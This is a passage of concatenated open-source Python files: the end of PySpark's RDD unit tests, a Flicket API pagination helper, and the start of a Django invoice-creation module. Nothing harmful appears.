# reading the first elem, waiting, and reading the second elem
# If not in parallel then these would be at different times
# But since they are being computed in parallel we see the time
# is "close enough" to the same.
rdd = self.sc.parallelize(range(2), 2)
times1 = rdd.map(lambda x: datetime.now())
times2 = rdd.map(lambda x: datetime.now())
times_iter_prefetch = times1.toLocalIterator(prefetchPartitions=True)
times_iter = times2.toLocalIterator(prefetchPartitions=False)
times_prefetch_head = next(times_iter_prefetch)
times_head = next(times_iter)
time.sleep(2)
times_next = next(times_iter)
times_prefetch_next = next(times_iter_prefetch)
self.assertTrue(times_next - times_head >= timedelta(seconds=2))
self.assertTrue(times_prefetch_next - times_prefetch_head < timedelta(seconds=1))
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_cartesian_chaining(self):
# Tests for SPARK-16589
rdd = self.sc.parallelize(range(10), 2)
self.assertSetEqual(
set(rdd.cartesian(rdd).cartesian(rdd).collect()),
set([((x, y), z) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.cartesian(rdd)).collect()),
set([(x, (y, z)) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.zip(rdd)).collect()),
set([(x, (y, y)) for x in range(10) for y in range(10)])
)
def test_zip_chaining(self):
# Tests for SPARK-21985
rdd = self.sc.parallelize('abc', 2)
self.assertSetEqual(
set(rdd.zip(rdd).zip(rdd).collect()),
set([((x, x), x) for x in 'abc'])
)
self.assertSetEqual(
set(rdd.zip(rdd.zip(rdd)).collect()),
set([(x, (x, x)) for x in 'abc'])
)
def test_union_pair_rdd(self):
# SPARK-31788: test if pair RDDs can be combined by union.
rdd = self.sc.parallelize([1, 2])
pair_rdd = rdd.zip(rdd)
unionRDD = self.sc.union([pair_rdd, pair_rdd])
self.assertEqual(
set(unionRDD.collect()),
set([(1, 1), (2, 2), (1, 1), (2, 2)])
)
self.assertEqual(unionRDD.count(), 4)
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy(blocking=True)
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_multithread_broadcast_pickle(self):
import threading
b1 = self.sc.broadcast(list(range(3)))
b2 = self.sc.broadcast(list(range(3)))
def f1():
return b1.value
def f2():
return b2.value
funcs_num_pickled = {f1: None, f2: None}
def do_pickle(f, sc):
command = (f, None, sc.serializer, sc.serializer)
ser = CloudPickleSerializer()
ser.dumps(command)
def process_vars(sc):
broadcast_vars = list(sc._pickled_broadcast_vars)
num_pickled = len(broadcast_vars)
sc._pickled_broadcast_vars.clear()
return num_pickled
def run(f, sc):
do_pickle(f, sc)
funcs_num_pickled[f] = process_vars(sc)
# pickle f1, adds b1 to sc._pickled_broadcast_vars in main thread local storage
do_pickle(f1, self.sc)
# run all for f2, should only add/count/clear b2 from worker thread local storage
t = threading.Thread(target=run, args=(f2, self.sc))
t.start()
t.join()
# count number of vars pickled in main thread, only b1 should be counted and cleared
funcs_num_pickled[f1] = process_vars(self.sc)
self.assertEqual(funcs_num_pickled[f1], 1)
self.assertEqual(funcs_num_pickled[f2], 1)
self.assertEqual(len(list(self.sc._pickled_broadcast_vars)), 0)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions_asc(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2, True)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_repartitionAndSortWithinPartitions_desc(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2, False)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(2, 6), (0, 5), (0, 8)])
self.assertEqual(partitions[1], [(3, 8), (3, 8), (1, 3)])
def test_repartition_no_skewed(self):
num_partitions = 20
a = self.sc.parallelize(range(int(1000)), 2)
l = a.repartition(num_partitions).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
l = a.coalesce(num_partitions, True).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
def test_repartition_on_textfile(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
rdd = self.sc.textFile(path)
result = rdd.repartition(1).collect()
self.assertEqual(u"Hello World!", result[0])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 2000001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('java').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('java', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
def test_pipe_unicode(self):
# Regression test for SPARK-20947
data = [u'\u6d4b\u8bd5', '1']
rdd = self.sc.parallelize(data)
result = rdd.pipe('cat').collect()
self.assertEqual(data, result)
def test_stopiteration_in_user_code(self):
def stopit(*x):
raise StopIteration()
seq_rdd = self.sc.parallelize(range(10))
keyed_rdd = self.sc.parallelize((x % 2, x) for x in range(10))
msg = "Caught StopIteration thrown from user's code; failing the task"
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.map(stopit).collect)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.filter(stopit).collect)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.foreach, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.reduce, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.fold, 0, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.foreach, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg,
seq_rdd.cartesian(seq_rdd).flatMap(stopit).collect)
# these methods call the user function both in the driver and in the executor
# the exception raised is different according to where the StopIteration happens
# RuntimeError is raised if in the driver
# Py4JJavaError is raised if in the executor (wraps the RuntimeError raised in the worker)
self.assertRaisesRegexp((Py4JJavaError, RuntimeError), msg,
keyed_rdd.reduceByKeyLocally, stopit)
self.assertRaisesRegexp((Py4JJavaError, RuntimeError), msg,
seq_rdd.aggregate, 0, stopit, lambda *x: 1)
self.assertRaisesRegexp((Py4JJavaError, RuntimeError), msg,
seq_rdd.aggregate, 0, lambda *x: 1, stopit)
def test_overwritten_global_func(self):
# Regression test for SPARK-27000
global global_func
self.assertEqual(self.sc.parallelize([1]).map(lambda _: global_func()).first(), "Hi")
global_func = lambda: "Yeah"
self.assertEqual(self.sc.parallelize([1]).map(lambda _: global_func()).first(), "Yeah")
def test_to_local_iterator_failure(self):
# SPARK-27548 toLocalIterator task failure not propagated to Python driver
def fail(_):
raise RuntimeError("local iterator error")
rdd = self.sc.range(10).map(fail)
with self.assertRaisesRegexp(Exception, "local iterator error"):
for _ in rdd.toLocalIterator():
pass
def test_to_local_iterator_collects_single_partition(self):
# Test that partitions are not computed until requested by iteration
def fail_last(x):
if x == 9:
raise RuntimeError("This should not be hit")
return x
rdd = self.sc.range(12, numSlices=4).map(fail_last)
it = rdd.toLocalIterator()
# Only consume first 4 elements from partitions 1 and 2, this should not collect the last
# partition which would trigger the error
for i in range(4):
self.assertEqual(i, next(it))
def test_resourceprofile(self):
rp_builder = ResourceProfileBuilder()
ereqs = ExecutorResourceRequests().cores(2).memory("6g").memoryOverhead("1g")
ereqs.pysparkMemory("2g").resource("gpu", 2, "testGpus", "nvidia.com")
treqs = TaskResourceRequests().cpus(2).resource("gpu", 2)
def assert_request_contents(exec_reqs, task_reqs):
self.assertEqual(len(exec_reqs), 5)
self.assertEqual(exec_reqs["cores"].amount, 2)
self.assertEqual(exec_reqs["memory"].amount, 6144)
self.assertEqual(exec_reqs["memoryOverhead"].amount, 1024)
self.assertEqual(exec_reqs["pyspark.memory"].amount, 2048)
self.assertEqual(exec_reqs["gpu"].amount, 2)
self.assertEqual(exec_reqs["gpu"].discoveryScript, "testGpus")
self.assertEqual(exec_reqs["gpu"].resourceName, "gpu")
self.assertEqual(exec_reqs["gpu"].vendor, "nvidia.com")
self.assertEqual(len(task_reqs), 2)
self.assertEqual(task_reqs["cpus"].amount, 2.0)
self.assertEqual(task_reqs["gpu"].amount, 2.0)
assert_request_contents(ereqs.requests, treqs.requests)
rp = rp_builder.require(ereqs).require(treqs).build
assert_request_contents(rp.executorResources, rp.taskResources)
rdd = self.sc.parallelize(range(10)).withResources(rp)
return_rp = rdd.getResourceProfile()
assert_request_contents(return_rp.executorResources, return_rp.taskResources)
rddWithoutRp = self.sc.parallelize(range(10))
self.assertEqual(rddWithoutRp.getResourceProfile(), None)
def test_multiple_group_jobs(self):
import threading
group_a = "job_ids_to_cancel"
group_b = "job_ids_to_run"
threads = []
thread_ids = range(4)
thread_ids_to_cancel = [i for i in thread_ids if i % 2 == 0]
thread_ids_to_run = [i for i in thread_ids if i % 2 != 0]
# A list which records whether job is cancelled.
# The index of the array is the thread index which job run in.
is_job_cancelled = [False for _ in thread_ids]
def run_job(job_group, index):
"""
Executes a job with the group ``job_group``. Each job waits for 3 seconds
and then exits.
"""
try:
self.sc.parallelize([15]).map(lambda x: time.sleep(x)) \
.collectWithJobGroup(job_group, "test rdd collect with setting job group")
is_job_cancelled[index] = False
except Exception:
# Assume that exception means job cancellation.
is_job_cancelled[index] = True
# Test if job succeeded when not cancelled.
run_job(group_a, 0)
self.assertFalse(is_job_cancelled[0])
# Run jobs
for i in thread_ids_to_cancel:
t = threading.Thread(target=run_job, args=(group_a, i))
t.start()
threads.append(t)
for i in thread_ids_to_run:
t = threading.Thread(target=run_job, args=(group_b, i))
t.start()
threads.append(t)
# Wait to make sure all jobs are executed.
time.sleep(3)
# And then, cancel one job group.
self.sc.cancelJobGroup(group_a)
# Wait until all threads launching jobs are finished.
for t in threads:
t.join()
for i in thread_ids_to_cancel:
self.assertTrue(
is_job_cancelled[i],
"Thread {i}: Job in group A was not cancelled.".format(i=i))
for i in thread_ids_to_run:
self.assertFalse(
is_job_cancelled[i],
"Thread {i}: Job in group B did not succeeded.".format(i=i))
if __name__ == "__main__":
import unittest
from pyspark.tests.test_rdd import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| ConeyLiu/spark | python/pyspark/tests/test_rdd.py | Python | apache-2.0 | 37,267 |
#! usr/bin/python3
# -*- coding: utf-8 -*-
#
# Flicket - copyright Paul Bourne: [email protected]
from flask import url_for
from application import app
class PaginatedAPIMixin(object):
@staticmethod
def to_collection_dict(query, page, per_page, endpoint, **kwargs):
resources = query.paginate(page, per_page, False)
data = {
'items': [item.to_dict() for item in resources.items],
'_meta': {
'page': page,
'per_page': per_page,
'total_pages': resources.pages,
'total_items': resources.total,
},
'_links': {
'self': app.config['base_url'] + url_for(endpoint, page=page, per_page=per_page, **kwargs),
'next': app.config['base_url'] + url_for(endpoint, page=page + 1, per_page=per_page,
**kwargs) if resources.has_next else None,
'prev': app.config['base_url'] + url_for(endpoint, page=page - 1, per_page=per_page,
**kwargs) if resources.has_prev else None,
},
}
return data
| evereux/flicket | application/flicket_api/scripts/paginated_api.py | Python | mit | 1,203 |
# -*- encoding: utf-8 -*-
import io
from datetime import date
from decimal import Decimal
from django.apps import apps
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import transaction
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4
from reportlab import platypus
from finance.models import VatSettings
from report.pdf import MyReport, NumberedCanvas
from .models import (
Invoice,
InvoiceContact,
InvoiceError,
InvoiceLine,
InvoiceSettings,
TimeRecord,
)
def format_minutes(minutes):
"""Convert minutes into formatted hours and minutes.
e.g. assert '01:15' == format_minutes(75)
From:
http://stackoverflow.com/questions/20291883/converting-minutes-to-hhmm-format-in-python
"""
return '{:02d}:{:02d}'.format(*divmod(int(minutes), 60))
class InvoiceCreate(object):
""" Create invoices for outstanding time records """
def _add_time_records(self, user, invoice, time_records):
"""Add time records to a draft invoice."""
